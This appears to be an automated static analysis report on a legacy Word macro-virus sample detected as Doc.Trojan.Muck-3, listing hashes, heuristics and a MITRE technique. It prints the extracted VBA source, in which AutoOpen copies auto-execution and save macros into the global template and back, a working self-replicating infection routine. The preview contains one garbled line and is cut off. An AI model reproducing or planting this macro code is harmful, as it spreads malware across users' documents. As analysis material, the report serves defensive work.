Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 497e4bbef409d8e8…

MALICIOUS

Office (OLE)

Size: 39.0 KB
Created: 1997-04-26 16:26:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: ab9a637c4e4f31c4e9ebd8dc5e140cac
SHA-1: cc0206fedeea827ca853c8a28f257be06ac5f1a6
SHA-256: 497e4bbef409d8e8f7f964ffebec68645bbf35412f86fae7c25522858c83ecc2
Risk Score: 260

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains legacy WordBasic macro virus markers and VBA macros, including AutoOpen and AutoClose, which are indicative of older malware attempting to infect templates. The script attempts to copy these macros to the global template, suggesting an intent to achieve persistence and potentially spread to other documents. The presence of 'Wazzu' as a marker further supports the legacy macro virus classification.

Heuristics 5

  • ClamAV: Doc.Trojan.Muck-3 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Muck-3
  • Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Auto_Close macro (high, OLE_VBA_AUTOCLOSE)
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5687 bytes
SHA-256: 056cdafe071f4217d7752e84ffe87c1cb0d6adba751e232947eaf089d5dfc1b2
Detection
ClamAV: Doc.Trojan.Muck-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Wazzu Virus Protection.  Used to install the Autoexec macro."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoOpen.MAIN"
Dim ExecuteOnly
On Error Resume Next
WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoOpen", "Global:AutoOpen", ExecuteOnly
WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoClose", "Global:AutoClose", ExecuteOnly
WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoNew", "Global:AutoNew", ExecuteOnly
WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoExit", "Global:AutoExit", ExecuteOnly
WordBasic.MacroCopy WordBasic.[FileName$]() + ":FileSave", "Global:FileSave", ExecuteOnly
WordBasic.MacroCopy WordBasic.[FileName$]() + ":FileSaveAs", "Global:FileSaveAs", ExecuteOnly


WordBasic.MacroCopy "Global:AutoOpen", WordBasic.[FileName$]() + ":AutoOpen", ExecuteOnly
WordBasic.MacroCopy "Global:AutoClose", WordBasic.[FileName$]() + ":AutoClose", ExecuteOnly
WordBasic.MacroCopy "Global:AutoNew", WordBasic.[FileName$]() + ":AutoNew", ExecuteOnly
WordBasic.MacroCopy "Global:AutoExit", WordBasic.[FileName$]() + ":AutoExit", ExecuteOnly
WordBasic.MacroCopy "Global:FileSave", WordBasic.[FileName$]() + ":FileSave", ExecuteOnly
WordBasic.MacroCopy "Global:FileSaveAs", WordBasic.[FileName$]() + ":FileSaveAs", ExecuteOnly
WordBasic.FileSaveAll 1
End Sub

Attribute VB_Name = "AutoClose"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Installed to your NORMAL template as AutoClose to clean the prank macros from any documents that you open then close."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoClose.MAIN"
End Sub

Attribute VB_Name = "AutoNew"

Public Sub MAIN()
Attribute MAIN.VB_Description = "When creating a new document this macro shows the IMI toolbar, maximizes the document, and zooms to fit page width."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoNew.MAIN"
Dim IsThereAnIni$
Dim Win$
Dim Platform$
Dim TitleBox$
Dim Copyright$
Dim StartupScreen$
Dim x
Dim Checked
    
Rem MAXIMIZE And SHOW TOOLBAR


UM DRRmemorWordBasic.ViewToolbars Toolbar:="IMI", Show:=1
WordBasic.DocMaximize 1
WordBasic.ViewZoom AutoFit:=1

On Error Resume Next

Rem MAKE INFOMAP.INI If IT DOES Not EXIST
IsThereAnIni$ = WordBasic.[GetPrivateProfileString$]("Word6", "StartupScreen", "InfoMap.ini")

If IsThereAnIni$ = "" Then WordBasic.SetPrivateProfileString "Word6", "StartupScreen", "On", "InfoMap.ini"

Rem DETERMINE PLATFORM For VERSION DISPLAY
Win$ = WordBasic.[GetSystemInfo$](21)

If Win$ = "Windows" Then Platform$ = "Windows" Else Platform$ = "Macintosh"

TitleBox$ = "Version 1.2 for " + Platform$

Copyright$ = "© 1994, Information Mapping, Inc.,  Waltham, MA.  All rights reserved."

Rem SET UP DIALOG BOX
WordBasic.BeginDialog 590, 269, TitleBox$
    WordBasic.Picture 13, 6, 567, 211, "LOGO", 1, "Picture1"
    WordBasic.Text 19, 251, 550, 13, Copyright$, "Text1"
    WordBasic.OKButton 416, 218, 88, 21
    WordBasic.CheckBox 25, 224, 236, 16, "Disable this startup screen.", "CheckBox1"
WordBasic.EndDialog

Dim dlg As Object: Set dlg = WordBasic.CurValues.UserDialog

WordBasic.CurValues.UserDialog dlg

StartupScreen$ = WordBasic.[GetPrivateProfileString$]("Word6", "StartupScreen", "InfoMap.ini")

If StartupScreen$ = "On" Then x = WordBasic.Dialog.UserDialog(dlg)

Checked = dlg.CheckBox1

If Checked = 1 Then WordBasic.SetPrivateProfileString "Word6", "StartupScreen", "Off", "InfoMap.ini"

End Sub

Attribute VB_Name = "FileSave"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Saves the active document or template"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSave.MAIN"
Dim ExecuteOnly
On Error Resume Next
WordBasic.FileSave
WordBasic.FileSa
... (truncated)